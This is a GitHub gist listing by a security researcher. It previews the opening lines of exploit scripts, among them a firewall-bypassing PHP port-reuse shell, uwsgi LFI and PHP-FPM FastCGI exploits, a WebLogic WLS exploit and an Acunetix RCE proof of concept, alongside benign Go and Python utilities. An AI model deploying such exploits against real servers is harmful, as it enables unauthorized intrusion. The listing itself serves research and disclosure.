Skip to content

Instantly share code, notes, and snippets.

View wofeiwo's full-sized avatar
💭
蚂蚁集团长期招人,安全各方面

GaRY wofeiwo

💭
蚂蚁集团长期招人,安全各方面
781 followers · 188 following
View GitHub Profile
@wofeiwo
wofeiwo / port_reuse.php
Last active July 26, 2023 22:17
Reuse Apache 80 port to spawn a interactive shell. Bypass the firewall.
<?php
//
// port_reuse.php
//
// Created by wofeiwo <wofeiwo@80sec.com> on 2011-08-27.
// Copyright 2011 80sec. All rights reserved.
// Reuse Apache 80 port to spawn a interactive shell. Bypass the firewall.
// Note: Only available on PHP >= 5.3.6 with mod_php on apache.
// Usage: 1. Put the script on htdocs.
// 2. Get interactive shell:
@wofeiwo
wofeiwo / gist:3634357
Created September 5, 2012 10:00
Golang daemonize
/* ivan(a.t)mysqlab.net */
package main
import (
"syscall"
"os"
"log"
)
func daemon(nochdir, noclose int) int {
@wofeiwo
wofeiwo / uwsgi_exp.py
Created August 10, 2017 10:30
Python uwsgi LFI exploit
#!/usr/bin/python
# coding: utf-8
# Author: wofeiwo@80sec.com
# Last modified: 2017-7-18
# Note: Just for research purpose
import sys
import socket
import argparse
import requests
@wofeiwo
wofeiwo / flup_fcgi_client.py
Created September 14, 2012 06:33
Python FCGI Client
#!/usr/bin/env python
# pylint: disable=W0622
# Copyright (c) 2006 Allan Saddi <allan@saddi.com>
# Copyright (c) 2011 Vladimir Rusinov <vladimir@greenmice.info>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
@wofeiwo
wofeiwo / fcgi_jailbreak.php
Created September 29, 2015 05:04
Jail break for PHP 5.3.3+ FASTCGI
<?php
/**
* PHP 5.3.3+ FASTCGI jailbreak
*
* @author wofeiwo <wofeiwo#80sec.com>
* @date 2013-01-23
* @version 1.0
* @reference https://bugs.php.net/bug.php?id=64103
* @reference http://www.wooyun.org/bugs/wooyun-2013-018116 (Chinese)
* @note disable php security settings, but can't overwrite disable_function/disable_classes.
@wofeiwo
wofeiwo / fcgi_exp.go
Created May 3, 2017 01:41
PHP-FPM Fastcgi Exploit
// PHP FactCGI remote exploit
// Date: 2012-09-15
// Author: wofeiwo@80sec.com
// Note: Just for research purpose
package main
import (
"./fcgiclient"
"fmt"
@wofeiwo
wofeiwo / Weblogic_WLS_exp.py
Created December 28, 2017 02:51
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def payload_command (command_in):
html_escape_table = {
"&": "&amp;",
'"': "&quot;",
@wofeiwo
wofeiwo / acu0day.py
Created December 29, 2017 02:57
Acunetix 0day RCE - (SYSTEM) Acunetix 0day RCE #Usage Run script with dzonerzy:dvm dzonerzy$ python /Users/dzonerzy/PycharmProjects/natbypass/acu0day.py 9999 172.16.24.1
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Acunetix 0day SYSTEM Remote Command Execution by Daniele Linguaglossa
This PoC exploit 2 vulnerability in Acunetix core , the first one is a RCE (Remote Command Exec) and the second one is
a LPE (Local Privilege Escalation).
All credits for this exploit goes to Daniele Linguaglossa
"""
@wofeiwo
wofeiwo / fcgiclient.go
Created September 15, 2012 09:08
Golang FastCGI Client
// Copyright 2012 Junqing Tan <ivan@mysqlab.net> and The Go Authors
// Use of this source code is governed by a BSD-style
// Part of source code is from Go fcgi package
// Fix bug: Can't recive more than 1 record untill FCGI_END_REQUEST 2012-09-15
// By: wofeiwo
package fcgiclient
import (
@wofeiwo
wofeiwo / readLines-writeLines.go
Created April 2, 2013 04:41
read lines write lines like python api in golang
package main
import (
"io"
"os"
"bufio"
"bytes"
"fmt"
"strings"
)